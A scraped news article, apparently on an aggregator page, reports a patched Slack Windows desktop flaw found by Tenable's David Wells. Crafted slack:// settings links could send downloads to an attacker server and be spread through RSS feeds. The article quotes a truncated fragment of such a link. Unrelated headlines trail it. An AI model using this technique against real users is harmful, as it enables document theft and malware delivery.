时间:2025-04-06 14:16:34 来源:网络整理编辑:熱點
A security researcher has uncovered a flaw in Slack that could've been exploited to steal files over
A security researcher has uncovered a flaw in Slack that could've been exploited to steal files over the business messaging app and potentially spread malware.
The flaw involves Slack's Windows desktop app, and how it can automatically send downloaded files to a certain destination—whether it be on your PC or to an online storage server. You can set a download location in the app's preferences section. However, David Wells, a researcher at the security firm Tenable, noticed there's another way to configure the option: Via a special link.
"Crafting a link like 'slack://settings/?update={ 'PrefSSBFileDownloadPath':
Wells realized the same function could be abused. Imagine a hacker using the links to secretly reconfigure a Slack desktop app to send all downloaded files to an outside server. "Using this attack vector, an insider could exploit this vulnerability for corporate espionage, manipulation, or to gain access to documents outside of their purview," Well's security firm Tenable said in a separate report.
The vulnerability can also pave the way for potential malware infections. Any downloaded files sent to the hacker-controller server can be altered and booby-trapped to include malicious code. The attack will commence once the victim opens the file on the Slack desktop app.
The main obstacle of carrying out this attack is circulating the hacker-created links to people on Slack, which keeps its channels private to paying clients and their companies. To pull this off, Wells noticed how Slack channels can be configured to subscribe to RSS feeds, including threads on Reddit.
"I could make a post to a very popular Reddit community that Slack users around the world are subscribed to," Wells said. The hacker-created link will then populate inside the Slack channel and possibly attract some clicks.
"This technique could be unmasked by savvy Slack users, however if decades of phishing campaigns have taught us anything, it's that users click links, and when leveraged through an untrusted RSS feed, the impact can get much more interesting," he added.
Slack has patched the flaw in version 3.4.0 of the Windows desktop app. "We investigated and found no indication that this vulnerability was ever utilized, nor reports that our users were impacted," the company said in an email.
This German startup wants to be your bank (without being a bank)2025-04-06 13:51
足協杯將分長春濟南大連梅州四賽區 明年1月決賽2025-04-06 12:44
國足傷情:三將中越之戰前康複 李磊傷病較為嚴重2025-04-06 12:43
曼聯老板暗示會繼續引援 中場和右後衛成重點目標2025-04-06 12:28
Singapore rolls out video2025-04-06 12:17
國足助教透露近期訓練重點 稱球員狀態有所提升2025-04-06 12:16
張琳芃 :腰傷最嚴重時走路像僵屍 目前專注體能盼早歸隊2025-04-06 12:15
武磊全記錄:對位阿庫尼亞被生吃 進攻端難敵孔德2025-04-06 12:12
Mall builds real2025-04-06 11:48
國足傷情:三將中越之戰前康複 李磊傷病較為嚴重2025-04-06 11:30
Darth Vader is back. Why do we still care?2025-04-06 14:04
唐佳麗:很幸運今天取得了助攻 希望進球快點來2025-04-06 13:54
為何不給C羅罰 ?B費絕平點球踢飛 索帥賽後避談此事2025-04-06 13:14
Apple Watch no longer has the blood oxygen feature2025-04-06 13:08
Michael Phelps says goodbye to the pool with Olympic gold2025-04-06 12:34
曝巴薩已與馬丁內斯接觸 比利時主帥或入主諾坎普2025-04-06 12:32
女足新帥候選之一曾執教中超球隊 目前在地方俱樂部任職2025-04-06 12:26
Apple Watch no longer has the blood oxygen feature2025-04-06 12:13
Twitter grants everyone access to quality filter for tweet notifications2025-04-06 12:11
水慶霞回應轉正反問記者:你們希望我當嗎 目前我一無所知2025-04-06 11:30